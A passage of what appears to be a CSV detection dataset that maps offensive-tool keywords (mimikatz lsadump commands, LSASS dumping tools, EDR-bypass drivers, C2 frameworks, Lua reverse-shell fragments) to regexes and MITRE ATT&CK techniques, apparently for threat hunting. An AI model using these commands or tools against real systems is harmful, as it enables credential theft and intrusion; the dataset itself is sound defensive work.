PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::netsync*",".{0,1000}lsadump\:\:netsync.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::packages*",".{0,1000}lsadump\:\:packages.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::postzerologon*",".{0,1000}lsadump\:\:postzerologon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::RpData*",".{0,1000}lsadump\:\:RpData.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::sam*",".{0,1000}lsadump\:\:sam.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::secrets*",".{0,1000}lsadump\:\:secrets.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::setntlm*",".{0,1000}lsadump\:\:setntlm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::trust*",".{0,1000}lsadump\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::zerologon*",".{0,1000}lsadump\:\:zerologon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsarelayx Starting....*",".{0,1000}lsarelayx\sStarting\.\.\.\..{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*lsarelayx.exe*",".{0,1000}lsarelayx\.exe.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*lsarelayx_0.1_ALPHA.zip*",".{0,1000}lsarelayx_0\.1_ALPHA\.zip.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*lsarpc_##*",".{0,1000}lsarpc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*LSASecretDefaultPassword*",".{0,1000}LSASecretDefaultPassword.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*lsasecrets.py*",".{0,1000}lsasecrets\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*lsass comsvcs*",".{0,1000}lsass\scomsvcs.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*lsass direct*",".{0,1000}lsass\sdirect.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Lsass Dump File Created*",".{0,1000}Lsass\sDump\sFile\sCreated.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*lsass dump from agent*",".{0,1000}lsass\sdump\sfrom\sagent.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*LSASS dump might fail if RunAsPPL is enabled*",".{0,1000}LSASS\sdump\smight\sfail\sif\sRunAsPPL\sis\senabled.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","lsass","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","N/A","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*lsass.dmp*",".{0,1000}lsass\.dmp.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*lsass.exe*.dmp*",".{0,1000}lsass\.exe.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*lsass.exe*C:\temp\tmp.tmp*",".{0,1000}lsass\.exe.{0,1000}C\:\\temp\\tmp\.tmp.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*lsass_*.dmp*",".{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*lsass_dump_*",".{0,1000}lsass_dump_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*lsass_dump_lsassy_*",".{0,1000}lsass_dump_lsassy_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*lsassdump.dmp*",".{0,1000}lsassdump\.dmp.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*LsassDump_20*.ps1*",".{0,1000}LsassDump_20.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","993","161","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*lsassDumpRetryCount*",".{0,1000}lsassDumpRetryCount.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*lsassdumps*",".{0,1000}lsassdumps.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*LSASSProtectionBypass*/",".{0,1000}LSASSProtectionBypass.{0,1000}\/","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*LsassSilentProcessExit.cpp*",".{0,1000}LsassSilentProcessExit\.cpp.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*LsassSilentProcessExit.exe*",".{0,1000}LsassSilentProcessExit\.exe.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*LsassSilentProcessExit.vcxproj*",".{0,1000}LsassSilentProcessExit\.vcxproj.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*LsassSilentProcessExit-master*",".{0,1000}LsassSilentProcessExit\-master.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*lsassy *",".{0,1000}lsassy\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lsassy -*",".{0,1000}lsassy\s\-.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*lsassy -v -*",".{0,1000}lsassy\s\-v\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*lsassy.*",".{0,1000}lsassy\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lsassy/dumpmethod*",".{0,1000}lsassy\/dumpmethod.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lsassy_dump*",".{0,1000}lsassy_dump.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*lsassy_dump*",".{0,1000}lsassy_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*lsassy_dump.py*",".{0,1000}lsassy_dump\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*lsassy-linux-x64-*",".{0,1000}lsassy\-linux\-x64\-.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lsassy-MacOS-x64-*",".{0,1000}lsassy\-MacOS\-x64\-.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lsassy-windows-x64-*.exe",".{0,1000}lsassy\-windows\-x64\-.{0,1000}\.exe","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*lse.sh -l*",".{0,1000}lse\.sh\s\-l.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*lsecqt/OffensiveCpp*",".{0,1000}lsecqt\/OffensiveCpp.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*lu4p/ToRat*",".{0,1000}lu4p\/ToRat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*lua -e*require('socket');*t:connect*os.execute('""/bin/bash"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""\/bin\/bash\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""/bin/sh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""\/bin\/sh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""bash"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""bash\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""cmd"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""cmd\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - 